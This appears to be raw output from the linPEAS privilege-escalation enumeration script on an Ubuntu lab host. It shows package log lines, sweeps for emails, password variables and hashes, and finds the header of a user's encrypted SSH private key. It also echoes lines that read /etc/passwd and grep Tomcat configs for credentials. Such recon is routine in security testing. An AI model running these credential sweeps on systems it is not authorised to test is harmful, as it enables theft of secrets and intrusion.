/var/log/dpkg.log:2017-08-01 11:17:35 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:35 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
/var/log/dpkg.log:2017-08-01 11:17:36 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/installer/status:Description: Set up users and passwords
[+] Finding emails inside logs (limit 70)
58 /var/log/installer/status:[email protected]
28 /var/log/installer/status:[email protected]
17 /var/log/installer/status:[email protected]
4 /var/log/bootstrap.log:[email protected]
[+] Finding *password* or *credential* files in home (limit 70)
[+] Finding 'pwd' or 'passw' variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/etc/acpi/powerbtn.sh: userhome=`getent passwd $user | cut -d: -f6`
/etc/bash_completion.d/grub:__grub_mkpasswd_pbkdf2_program="grub-mkpasswd-pbkdf2"
/etc/nsswitch.conf:passwd: compat
/etc/samba/smb.conf.bak: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf.bak: passwd program = /usr/bin/passwd %u
/etc/security/namespace.init: gid=$(echo "$passwd" | cut -f4 -d":")
/etc/security/namespace.init: homedir=$(echo "$passwd" | cut -f6 -d":")
/etc/security/namespace.init: passwd=$(getent passwd "$user")
/tmp/linpeas.sh: SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1`
[+] Finding possible password variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
[+] Finding 'username' string inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/tmp/linpeas.sh: for f in $tomcat; do grep "username=" $f 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done
[+] Looking for specific hashes inside files - less false positives (limit 70)
[+] Looking for md5/sha1/sha256/sha512 hashes inside files (limit 50)
/etc/java-8-openjdk/security/blacklisted.certs:14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD
/etc/grub.d/05_debian_theme:648ee65dd0c157a69b019a5372cbcfea4fc754a5
/etc/machine-id:a59c744e2166cb4a90376b2f5ad6279f
/etc/popularity-contest.conf:"381d9c0601344d33897a7a5a7f8815c0"
/home/kay/.ssh/id_rsa:,6ABA7DE35CDB65070B92C1F760E2FE75